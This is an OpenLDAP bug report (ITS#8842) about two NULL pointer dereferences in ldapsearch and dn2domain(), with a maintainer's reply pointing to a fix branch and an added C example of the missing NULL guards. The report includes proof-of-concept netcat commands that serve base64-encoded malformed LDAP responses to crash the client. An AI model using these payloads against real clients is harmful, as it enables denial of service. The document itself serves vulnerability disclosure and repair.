OpenLDAP
Viewing Software Bugs/8842
Date: Tue, 01 May 2018 20:14:50 +0000
From: openldap@katzen.cc
To: openldap-its@OpenLDAP.org
Subject: NULL pointer dereference
Full_Name: Catz Meow
Version: openldap-2.4.46
OS: Archlinux
URL: ftp://ftp.openldap.org/incoming/
Submission from: (NULL) (134.19.121.246)


2 small issues:
I'm keeping it brief, let me know if you need more information.

A malicious LDAP server or MITM attacker can craft a response that causes the
ldap client to crash. Nothing critical, just a simple DoS.

echo "MAwCAQFhBwoBAAQABAAwNgIBAnkxBBFkYz1leGFtcGxlLGRjPWNvbQoBAgoBAAIBAAIBAAEBAIcL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" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


Affected code:
./clients/tools/ldapsearch.c

static int dosearch(
[...]
		case LDAP_RES_INTERMEDIATE:
			npartial++;
			ldap_parse_intermediate( ld, msg,
				&retoid, &retdata, NULL, 0 );
			nresponses_psearch = 0;
			if ( strcmp( retoid, LDAP_SYNC_INFO ) == 0 ) {

The problem here is that retoid can be NULL after ldap_parse_intermediate() is called.

Another NULL pointer dereference caused by a bad response:

echo "MAwCAQFhBwoBAAQABAAwgYkCAQJkgYMEEWRjPWV4YW1wbGUsZGM9AARtMG4wJwQLb2JqZWN0Q2xh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" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


The PoC leads to memcpy being called with a NULL pointer as second argument
(ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):

AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);





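The two guards the report calls for, as an added example that is neither OpenLDAP's code nor the reporter's: a minimal decoder for the body of an IntermediateResponse (APPLICATION 25, RFC 4511 section 4.13) that leaves responseName NULL when the server omits the [0] element (the first PoC puts a plain OCTET STRING there, which is exactly that case), a dispatch that tests the pointer before strcmp() against LDAP_SYNC_INFO, and a berval copy that refuses a NULL bv_val before memcpy(). The struct berval here is a stand-in for libldap's, the sample bodies are constructed, and the helper names (tlv_next, parse_intermediate, classify_intermediate, copy_value, copy_value_check) are this example's own; the branch linked in the followup may fix the two spots differently.

```c
/*
 * Added example, not code from OpenLDAP or from the reporter: a minimal
 * decoder for the body of an LDAP IntermediateResponse with the two NULL
 * guards the report asks for. The sample bodies, the berval stand-in and
 * the helper names are this example's own; only LDAP_SYNC_INFO is a real
 * OID (RFC 4533). Assumes short-form BER lengths (elements under 128 bytes).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LDAP_SYNC_INFO "1.3.6.1.4.1.4203.1.9.1.4"

struct berval { size_t bv_len; char *bv_val; };   /* stand-in for libldap's */

/* Constructed sample bodies: everything after the APPLICATION 25 header. */
/* A well-formed syncInfo message: responseName [0] present, empty [1]. */
const unsigned char SYNC_INFO_BODY[] = {
    0x80, 0x18, '1','.','3','.','6','.','1','.','4','.','1','.',
    '4','2','0','3','.','1','.','9','.','1','.','4',
    0x81, 0x00 };
/* Shaped like the report's first PoC: a universal OCTET STRING where the
   client expects [0], so responseName is simply absent. */
const unsigned char NO_NAME_BODY[] = {
    0x04, 0x11, 'd','c','=','e','x','a','m','p','l','e',',','d','c','=','c','o','m' };
/* Named, but some other OID. */
const unsigned char OTHER_NAME_BODY[] = { 0x80, 0x03, '1','.','2' };
/* Length claims 16 bytes, only 2 follow. */
const unsigned char TRUNCATED_BODY[] = { 0x80, 0x10, 'a','b' };

/* Read one short-form BER TLV at buf[*pos]; 0 on success, -1 if malformed. */
static int tlv_next(const unsigned char *buf, size_t len, size_t *pos,
                    unsigned char *tag, const unsigned char **val, size_t *vlen)
{
    if (*pos + 2 > len) return -1;
    *tag = buf[*pos];
    *vlen = buf[*pos + 1];
    if (*vlen & 0x80) return -1;                 /* long-form length: not handled */
    if (*vlen > len - *pos - 2) return -1;       /* truncated element */
    *val = buf + *pos + 2;
    *pos += 2 + *vlen;
    return 0;
}

/*
 * Decode an IntermediateResponse body. On success *oid is a malloc'd,
 * NUL-terminated copy of responseName, or NULL when the server sent no [0]
 * element (the situation behind the first crash in the report).
 */
int parse_intermediate(const unsigned char *body, size_t len, char **oid)
{
    size_t pos = 0;
    *oid = NULL;
    while (pos < len) {
        unsigned char tag; const unsigned char *val; size_t vlen;
        if (tlv_next(body, len, &pos, &tag, &val, &vlen) != 0) {
            free(*oid); *oid = NULL;
            return -1;
        }
        if (tag == 0x80 && *oid == NULL) {       /* responseName [0] */
            *oid = malloc(vlen + 1);
            if (*oid == NULL) return -1;
            memcpy(*oid, val, vlen);
            (*oid)[vlen] = '\0';
        }
        /* [1] responseValue and anything else is skipped here. */
    }
    return 0;
}

/* 1 = syncInfo, 0 = other or unnamed intermediate response, -1 = malformed.
   The NULL test before strcmp() is the guard the quoted ldapsearch.c lacks. */
int classify_intermediate(const unsigned char *body, size_t len)
{
    char *oid;
    int rc;
    if (parse_intermediate(body, len, &oid) != 0) return -1;
    rc = (oid != NULL && strcmp(oid, LDAP_SYNC_INFO) == 0) ? 1 : 0;
    free(oid);
    return rc;
}

/* Copy an AVA value plus its NUL into dst, as dn2domain() does for dc=
   components, but refuse a berval whose bv_val is NULL. Returns 0 or -1. */
int copy_value(char *dst, size_t cap, const struct berval *v)
{
    if (v->bv_val == NULL || v->bv_len + 1 > cap) return -1;
    memcpy(dst, v->bv_val, v->bv_len + 1);
    return 0;
}

/* Wrapper: NULL models an AVA with no value (bv_len 0, bv_val NULL). */
int copy_value_check(const char *s)
{
    char dst[64];
    struct berval v = { s ? strlen(s) : 0, (char *)s };
    return copy_value(dst, sizeof dst, &v);
}

int main(void)
{
    printf("syncInfo body  -> %d\n", classify_intermediate(SYNC_INFO_BODY, sizeof SYNC_INFO_BODY));
    printf("unnamed body   -> %d\n", classify_intermediate(NO_NAME_BODY, sizeof NO_NAME_BODY));
    printf("other name     -> %d\n", classify_intermediate(OTHER_NAME_BODY, sizeof OTHER_NAME_BODY));
    printf("truncated body -> %d\n", classify_intermediate(TRUNCATED_BODY, sizeof TRUNCATED_BODY));
    printf("NULL value     -> %d\n", copy_value_check(NULL));
    return 0;
}
```

Build with cc -std=c99 and run: classify_intermediate() returns 1 only for the syncInfo body, 0 for the unnamed PoC-shaped body and the other named one, -1 for the truncated one, and copy_value_check(NULL) returns -1 instead of reaching memcpy().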
Followup 1

Date: Thu, 21 Jun 2018 17:29:24 +0200
From: Ondřej Kuzník <ondra@mistotebe.net>
To: openldap@katzen.cc
Cc: openldap-its@OpenLDAP.org
Subject: Re: (ITS#8842) NULL pointer dereference
On Tue, May 01, 2018 at 08:14:50PM +0000, openldap@katzen.cc wrote:
> 2 small issues:
> I'm keeping it brief, let me know if you need more information.
> 
> A malicious LDAP server or MITM attacker can craft a response that causes the
> ldap client to crash. Nothing critical, just a simple DoS.
> [...]
> The problem here is that retoid can be NULL after ldap_parse_intermediate()
> is called.
>
> Another NULL pointer dereference caused by a bad response:
> [...]
> The PoC leads to memcpy being called with a NULL pointer as second argument
> (ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):
> 
> AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);

Both are fixed in this branch:
https://github.com/mistotebe/openldap/tree/its8842

-- 
Ondřej Kuzník
Senior Software Engineer
Symas Corporation                       http://www.symas.com
Packaged, certified, and supported LDAP solutions powered by OpenLDAP

